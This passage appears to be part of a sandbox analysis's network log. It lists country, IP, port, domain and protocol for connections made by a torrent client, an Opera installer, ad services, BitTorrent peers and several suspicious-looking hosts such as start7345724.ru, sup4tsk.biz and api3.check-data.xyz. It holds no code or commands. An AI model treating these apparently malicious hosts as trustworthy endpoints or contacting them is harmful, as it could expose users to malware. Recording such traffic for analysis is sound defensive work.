| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 87.248.204.1:443 | video.rainberrytv.com | tcp |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| US | 44.196.243.250:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| FR | 5.135.209.97:443 | www9.smartadserver.com | tcp |
| FR | 5.135.209.97:443 | www9.smartadserver.com | tcp |
| CN | 111.19.60.107:34753 | udp | |
| GB | 95.101.143.219:443 | www.bing.com | tcp |
| GB | 95.101.143.219:443 | www.bing.com | tcp |
| BR | 191.177.173.147:3151 | udp | |
| KR | 121.150.12.18:7973 | udp | |
| GB | 142.250.187.238:443 | google.com | udp |
| NL | 185.107.44.203:49565 | udp | |
| US | 44.197.0.133:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| FR | 5.135.209.97:443 | www9.smartadserver.com | tcp |
| FR | 5.135.209.97:443 | www9.smartadserver.com | tcp |
| KR | 115.40.161.85:40841 | udp | |
| IT | 151.84.66.15:6881 | udp | |
| BR | 179.48.204.224:51400 | udp | |
| RU | 185.97.201.209:11569 | udp | |
| IS | 185.191.232.75:44636 | udp | |
| NL | 178.162.174.11:28007 | udp | |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| CN | 221.219.96.184:51414 | udp | |
| US | 8.8.8.8:53 | skidrowgamereloaded.co | udp |
| US | 172.67.218.22:443 | skidrowgamereloaded.co | tcp |
| BR | 200.193.111.23:53288 | udp | |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| ID | 36.85.222.58:10837 | udp | |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| US | 8.8.8.8:53 | api-torrent.ru | udp |
| NL | 104.192.42.148:443 | api-torrent.ru | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| US | 8.8.8.8:53 | 58.222.85.36.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.42.192.104.in-addr.arpa | udp |
| US | 104.21.87.238:443 | fold.hibiscusespears.com | tcp |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| RU | 95.163.241.63:80 | 95.163.241.63 | tcp |
| SE | 185.117.88.231:80 | bobisawinner.xyz | tcp |
| US | 8.8.8.8:53 | 63.241.163.95.in-addr.arpa | udp |
| SE | 185.117.88.231:80 | bobisawinner.xyz | tcp |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| RU | 178.71.116.242:6881 | udp | |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| NL | 185.26.182.123:443 | autoupdate.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 82.145.216.47:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.216.16:443 | features.opera-api2.com | tcp |
| US | 104.18.25.17:443 | api.config.opr.gg | tcp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 17.25.18.104.in-addr.arpa | udp |
| NL | 82.145.216.49:443 | download.opera.com | tcp |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| US | 104.18.10.89:443 | download5.operacdn.com | tcp |
| SE | 81.226.111.18:6881 | udp | |
| US | 8.8.4.4:443 | dns.google | udp |
| BR | 200.193.105.50:50321 | udp | |
| GB | 87.248.205.1:443 | video.rainberrytv.com | tcp |
| GB | 87.248.205.1:443 | video.rainberrytv.com | tcp |
| GB | 87.248.205.1:443 | video.rainberrytv.com | tcp |
| US | 3.214.87.95:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 8.8.8.8:53 | exodus.desync.com | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 3.214.87.95:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 172.165.69.228:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 95.101.143.176:443 | download3.operacdn.com | tcp |
| NL | 104.192.42.148:443 | api-torrent.ru | tcp |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| KR | 118.42.45.204:33001 | udp | |
| US | 3.214.87.95:80 | i-72.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.214.87.95:80 | i-72.b-47142.ut.bench.utorrent.com | tcp |
| US | 34.196.244.100:443 | i-72.b-47142.ut.bench.utorrent.com | tcp |
| US | 34.196.244.100:443 | i-72.b-47142.ut.bench.utorrent.com | tcp |
| US | 34.196.244.100:443 | i-72.b-47142.ut.bench.utorrent.com | tcp |
| US | 34.196.244.100:443 | i-72.b-47142.ut.bench.utorrent.com | tcp |
| US | 34.196.244.100:443 | i-72.b-47142.ut.bench.utorrent.com | tcp |
| US | 34.196.244.100:443 | i-72.b-47142.ut.bench.utorrent.com | tcp |
| US | 208.67.222.222:53 | 83.176.215.181.in-addr.arpa | udp |
| US | 199.59.243.227:6969 | 9.rarbg.me | udp |
| FR | 5.196.111.64:443 | www9.smartadserver.com | tcp |
| FR | 5.196.111.64:443 | www9.smartadserver.com | tcp |
| US | 8.8.8.8:53 | 227.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.111.196.5.in-addr.arpa | udp |
| US | 44.197.0.133:80 | i-72.b-47142.ut.bench.utorrent.com | tcp |
| PH | 49.149.91.29:1067 | udp | |
| GB | 86.26.0.9:47263 | udp | |
| BR | 179.108.91.132:55404 | udp | |
| BR | 186.205.17.139:5350 | udp | |
| N/A | 239.192.152.143:6771 | udp | |
| MY | 14.192.213.215:12147 | udp | |
| NL | 46.232.211.200:24259 | udp | |
| NL | 176.56.239.28:6774 | udp | |
| PL | 89.64.29.38:50042 | udp | |
| UA | 31.133.61.47:2314 | udp | |
| NL | 95.211.110.228:28010 | udp | |
| AU | 101.177.69.77:6881 | udp | |
| CL | 186.10.170.97:1337 | tracker.internetwarriors.net | udp |
| NL | 143.179.179.57:49001 | udp | |
| HK | 125.59.194.159:11237 | udp | |
| NL | 193.23.249.199:50171 | udp | |
| IT | 93.47.37.25:6983 | udp | |
| SG | 43.133.62.119:15000 | udp | |
| IT | 95.231.184.71:52153 | udp | |
| BR | 177.4.122.103:37321 | udp | |
| HK | 119.236.124.76:49001 | udp | |
| SI | 89.142.16.194:49001 | udp | |
| KR | 121.173.203.128:40877 | udp | |
| CN | 125.37.189.34:41700 | udp | |
| IL | 5.29.9.99:40022 | udp | |
| US | 75.103.160.164:56294 | udp | |
| IN | 157.38.116.237:50249 | udp | |
| CN | 120.232.79.248:2063 | udp | |
| BR | 45.233.81.244:44698 | udp | |
| ES | 95.17.53.127:20022 | udp | |
| EG | 41.47.7.233:52057 | udp | |
| US | 8.8.8.8:53 | 139.17.205.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.152.192.239.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.213.192.14.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.211.232.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.239.56.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.29.64.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.61.133.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.110.211.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.69.177.101.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.170.10.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.179.179.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.194.59.125.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.249.23.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.37.47.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.62.133.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.184.231.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.122.4.177.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.124.236.119.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.16.142.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.203.173.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.189.37.125.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.9.29.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.160.103.75.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.116.38.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.79.232.120.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.81.233.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.53.17.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.7.47.41.in-addr.arpa | udp |
| DZ | 41.99.87.115:55196 | udp | |
| US | 104.222.16.99:57190 | udp | |
| PL | 83.29.62.94:60923 | udp | |
| DZ | 41.99.87.115:55196 | tcp | |
| US | 104.222.16.99:57190 | tcp | |
| PL | 83.29.62.94:60923 | tcp | |
| GB | 217.44.73.79:43558 | udp | |
| GB | 217.44.73.79:43558 | tcp | |
| GB | 181.215.176.83:50993 | udp | |
| GB | 181.215.176.83:50993 | tcp | |
| NL | 93.158.213.92:1337 | tracker.opentrackr.org | udp |
| US | 44.196.33.1:443 | ledger.bt.co | tcp |
| US | 3.210.17.85:80 | i-28.b-47142.ut.bench.utorrent.com | tcp |
| GB | 88.221.134.194:443 | ced.sascdn.com | tcp |
| US | 3.214.87.95:80 | i-28.b-47142.ut.bench.utorrent.com | tcp |
| US | 146.70.173.160:62801 | udp | |
| US | 146.70.172.32:62801 | udp | |
| CH | 188.60.237.252:1024 | udp | |
| GB | 143.58.200.241:56820 | udp | |
| KR | 221.144.33.54:42597 | udp | |
| BR | 191.6.103.225:51060 | udp | |
| RU | 89.208.97.54:34847 | udp | |
| JP | 203.165.46.46:6881 | udp | |
| IT | 93.35.168.249:32775 | udp | |
| BR | 189.74.219.253:46244 | udp | |
| MX | 177.245.155.112:33544 | udp | |
| FI | 65.108.78.54:6881 | udp | |
| GY | 190.80.34.130:57072 | udp | |
| BG | 79.100.105.107:51769 | udp | |
| RU | 46.63.252.24:49001 | udp | |
| US | 3.214.87.95:80 | i-28.b-47142.ut.bench.utorrent.com | tcp |
| US | 146.70.173.160:62801 | tcp | |
| US | 146.70.172.32:62801 | tcp | |
| US | 103.224.182.246:6969 | tracker.coppersurfer.tk | udp |
| VN | 183.80.50.58:49836 | udp | |
| PH | 175.176.50.58:15577 | udp | |
| N/A | 239.192.152.143:6771 | udp | |
| BR | 200.225.113.105:35281 | udp | |
| US | 3.214.87.95:80 | i-28.b-47142.ut.bench.utorrent.com | tcp |
| IQ | 37.239.7.233:49784 | udp | |
| UZ | 213.230.116.237:42637 | udp | |
| US | 8.8.8.8:53 | 54.33.144.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.97.208.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.46.165.203.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.34.80.190.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.182.224.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.50.80.183.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.105.100.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.219.74.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.168.35.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.200.58.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.7.239.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.116.230.213.in-addr.arpa | udp |
| N/A | 10.127.0.42:50993 | udp | |
| N/A | 127.0.0.1:50993 | udp | |
| N/A | 10.127.0.42:50993 | tcp | |
| N/A | 127.0.0.1:50993 | tcp | |
| FR | 45.147.96.190:51413 | udp | |
| AU | 123.208.50.58:33591 | udp | |
| IE | 54.194.124.68:6881 | udp | |
| MX | 189.140.142.38:53972 | udp | |
| CN | 183.192.15.122:8906 | udp | |
| BR | 189.29.137.99:40440 | udp | |
| KR | 125.132.186.103:6881 | udp | |
| SG | 58.182.157.48:6881 | udp | |
| KR | 121.151.53.141:7829 | udp | |
| AM | 5.77.205.165:58984 | udp | |
| RU | 5.44.10.224:2079 | udp | |
| CA | 99.252.147.131:57823 | udp | |
| US | 8.8.8.8:53 | 131.147.252.99.in-addr.arpa | udp |
| BR | 177.137.146.50:15039 | udp | |
| SG | 101.32.169.145:6881 | udp | |
| HK | 119.28.68.97:6881 | udp | |
| RU | 91.132.107.136:1426 | udp | |
| NZ | 121.75.17.177:8621 | udp | |
| RU | 95.24.4.152:6859 | udp | |
| US | 8.8.8.8:53 | 152.4.24.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.146.137.177.in-addr.arpa | udp |
| CN | 223.74.72.241:58109 | udp | |
| RU | 109.252.14.38:1838 | udp | |
| RU | 81.24.85.119:1215 | udp | |
| TH | 223.207.218.121:49001 | udp | |
| US | 3.214.87.95:80 | i-28.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.214.87.95:80 | i-28.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.214.87.95:80 | i-28.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.214.87.95:80 | i-28.b-47142.ut.bench.utorrent.com | tcp |
| KR | 125.143.41.188:1070 | udp | |
| IT | 82.49.87.112:6881 | udp | |
| US | 199.59.243.227:2730 | 9.rarbg.me | udp |
| CN | 119.177.55.156:25702 | udp | |
| NL | 87.233.192.212:6969 | eddie4.nl | udp |
| TT | 143.137.195.221:38339 | udp | |
| RU | 77.91.229.218:6969 | tracker.mg64.net | udp |
| US | 8.8.8.8:53 | 218.229.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | open.demonii.si | udp |
| CZ | 46.8.8.100:1337 | open.demonii.si | udp |
| RU | 83.146.81.79:6969 | tracker.tiny-vps.com | udp |
| US | 8.8.8.8:53 | ipv6.tracker.harry.lu | udp |
| US | 38.89.70.177:61792 | udp | |
| US | 199.59.243.227:2740 | tracker.justseed.it | udp |
| US | 199.59.243.227:2770 | tracker.justseed.it | udp |
| NL | 104.192.42.148:443 | api-torrent.ru | tcp |
| NL | 194.146.127.97:443 | s2.api-torrent.ru | tcp |
| US | 8.8.8.8:53 | 97.127.146.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | denis.stalker.upeer.me | udp |
| GB | 88.221.135.9:80 | e6.i.lencr.org | tcp |
| N/A | 127.0.0.1:6969 | udp | |
| US | 104.21.54.3:6969 | tracker.moeking.me | udp |
| US | 208.83.20.20:6969 | exodus.desync.com | udp |
| BR | 45.239.222.18:51536 | udp | |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 199.59.243.227:1337 | tracker.justseed.it | udp |
| FR | 89.234.156.205:451 | tracker.torrent.eu.org | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| NL | 139.45.197.238:443 | rouonixon.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 172.67.169.157:443 | my.rtmark.net | udp |
| US | 172.67.169.157:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| GB | 23.214.144.96:443 | s.click.aliexpress.com | tcp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| GB | 95.100.244.132:443 | s.go-mpulse.net | tcp |
| N/A | 127.0.0.1:80 | udp | |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| US | 208.100.26.242:6969 | tracker.open-internet.nl | udp |
| US | 8.8.8.8:53 | bottom.campaign.aliexpress.com | udp |
| US | 8.8.8.8:53 | bottom.campaign.aliexpress.com | udp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | ae.mmstat.com | udp |
| US | 8.8.8.8:53 | ae.mmstat.com | udp |
| GB | 2.18.108.132:443 | c.go-mpulse.net | tcp |
| SG | 47.246.110.44:443 | ae.mmstat.com | tcp |
| GB | 163.181.154.244:443 | bottom.campaign.aliexpress.com | tcp |
| US | 8.8.8.8:53 | 133.194.101.151.in-addr.arpa | udp |
| US | 172.234.222.143:6969 | torrentclub.tech | udp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| NO | 185.243.218.213:80 | open.stealth.si | udp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | acs.aliexpress.com | udp |
| US | 8.8.8.8:53 | acs.aliexpress.com | udp |
| US | 8.8.8.8:53 | aeis.alicdn.com | udp |
| US | 8.8.8.8:53 | aeis.alicdn.com | udp |
| DE | 47.246.146.13:443 | acs.aliexpress.com | tcp |
| MX | 189.219.231.179:3291 | udp | |
| US | 8.8.8.8:53 | us.ynuf.aliapp.org | udp |
| US | 172.234.222.138:80 | torrentclub.tech | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 172.234.222.143:80 | torrentclub.tech | tcp |
| US | 8.8.4.4:443 | dns.google | udp |
| SG | 13.229.114.252:443 | wstracker.online | tcp |
| DE | 47.246.146.192:443 | tcp | |
| CN | 124.239.14.253:443 | tcp | |
| CN | 124.239.14.253:443 | tcp | |
| DE | 47.246.146.191:443 | tcp | |
| IN | 117.193.236.132:48490 | udp | |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| AU | 203.220.191.213:61986 | udp | |
| GB | 88.221.134.137:80 | r10.o.lencr.org | tcp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| GB | 95.100.244.132:443 | s.go-mpulse.net | udp |
| US | 172.67.192.10:80 | start7345724.ru | tcp |
| US | 35.162.118.53:80 | api3.check-data.xyz | tcp |
| US | 172.67.159.189:443 | gamecloudshare.uno | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.162.118.53:443 | api3.check-data.xyz | tcp |
| HU | 5.187.235.0:50921 | udp | |
| KZ | 185.22.66.16:80 | www.rapidfilestorage.com | tcp |
| KZ | 185.22.66.16:80 | www.rapidfilestorage.com | tcp |
| RU | 80.78.240.92:80 | rfiles5.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles5.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles5.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles5.tracemonitors.com | tcp |
| GB | 216.58.212.227:443 | update.googleapis.com | tcp |
| US | 172.67.218.22:443 | skidrowgamereloaded.co | tcp |
| US | 172.67.139.119:443 | ka-f.fontawesome.com | tcp |
| GB | 142.250.180.14:443 | www.youtube.com | udp |
| GB | 142.250.180.14:443 | www.youtube.com | tcp |
| CN | 124.239.14.252:443 | tcp | |
| US | 172.64.147.188:443 | kit.fontawesome.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| CN | 124.239.14.252:443 | tcp | |
| RU | 88.212.201.198:443 | counter.yadro.ru | tcp |
| GB | 142.250.178.22:443 | i.ytimg.com | udp |
| DZ | 41.99.87.115:55196 | tcp | |
| GB | 142.250.187.206:443 | www.youtube.com | udp |
| GB | 142.250.187.206:443 | www.youtube.com | tcp |
| US | 44.226.34.177:443 | api3.check-data.xyz | tcp |
| US | 44.226.34.177:443 | api3.check-data.xyz | tcp |
| SA | 31.166.86.133:28389 | udp | |
| NL | 104.192.42.148:443 | api-torrent.ru | tcp |
| US | 172.234.222.138:80 | torrentclub.tech | tcp |
| US | 172.234.222.143:80 | torrentclub.tech | tcp |
| CA | 174.93.18.28:47445 | udp | |
| US | 8.8.4.4:443 | dns.google | udp |
| GB | 172.165.69.228:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | nav.smartscreen.microsoft.com | tcp |
| US | 44.196.243.250:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 34.192.104.143:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 34.192.104.143:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| FR | 5.196.111.64:443 | www9.smartadserver.com | tcp |
| FR | 5.196.111.64:443 | www9.smartadserver.com | tcp |
| US | 146.70.172.32:62801 | tcp | |
| RU | 95.78.208.118:52201 | udp | |
| GB | 181.215.176.83:50993 | tcp | |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 146.70.173.160:62801 | tcp | |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| KZ | 188.0.147.111:20504 | udp | |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| NL | 139.45.197.238:443 | rouonixon.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 104.21.27.183:443 | my.rtmark.net | udp |
| US | 104.21.27.183:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| GB | 23.214.144.96:443 | s.click.aliexpress.com | tcp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| GB | 95.100.244.132:443 | s.go-mpulse.net | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| GB | 2.18.108.132:443 | c.go-mpulse.net | tcp |
| US | 8.8.8.8:53 | bottom.campaign.aliexpress.com | udp |
| US | 8.8.8.8:53 | ae.mmstat.com | udp |
| US | 8.8.8.8:53 | ae.mmstat.com | udp |
| SG | 47.246.110.45:443 | ae.mmstat.com | tcp |
| GB | 163.181.154.244:443 | bottom.campaign.aliexpress.com | tcp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | acs.aliexpress.com | udp |
| US | 8.8.8.8:53 | acs.aliexpress.com | udp |
| DE | 47.246.146.13:443 | acs.aliexpress.com | tcp |
| US | 8.8.8.8:53 | aeis.alicdn.com | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | udp |
| RU | 5.140.3.18:49001 | udp | |
| DE | 47.246.146.53:443 | tcp | |
| CN | 124.239.14.252:443 | tcp | |
| DE | 47.246.146.54:443 | us.ynuf.aliapp.org | tcp |
| CN | 124.239.14.252:443 | tcp | |
| RU | 152.89.198.214:53 | bbeeeki.com | udp |
| US | 185.208.158.202:80 | bbeeeki.com | tcp |
| US | 8.8.8.8:53 | 202.158.208.185.in-addr.arpa | udp |
| KR | 221.165.161.197:40629 | udp | |
| US | 172.234.222.143:80 | torrentclub.tech | tcp |
| US | 172.234.222.138:80 | torrentclub.tech | tcp |
| KR | 112.184.199.201:40796 | udp | |
| FR | 5.196.111.64:443 | www9.smartadserver.com | tcp |
| FR | 5.196.111.64:443 | www9.smartadserver.com | tcp |
| US | 104.222.16.99:57190 | tcp | |
| GB | 217.44.73.79:43558 | tcp | |
| CN | 114.84.254.47:42833 | udp | |
| CN | 124.239.14.253:443 | tcp | |
| CN | 124.239.14.253:443 | tcp | |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| GB | 90.242.248.253:8025 | udp | |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| NL | 139.45.197.238:443 | rouonixon.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 104.21.27.183:443 | my.rtmark.net | udp |
| US | 104.21.27.183:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| GB | 23.214.144.96:443 | s.click.aliexpress.com | tcp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 95.100.244.132:443 | s.go-mpulse.net | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | bottom.campaign.aliexpress.com | udp |
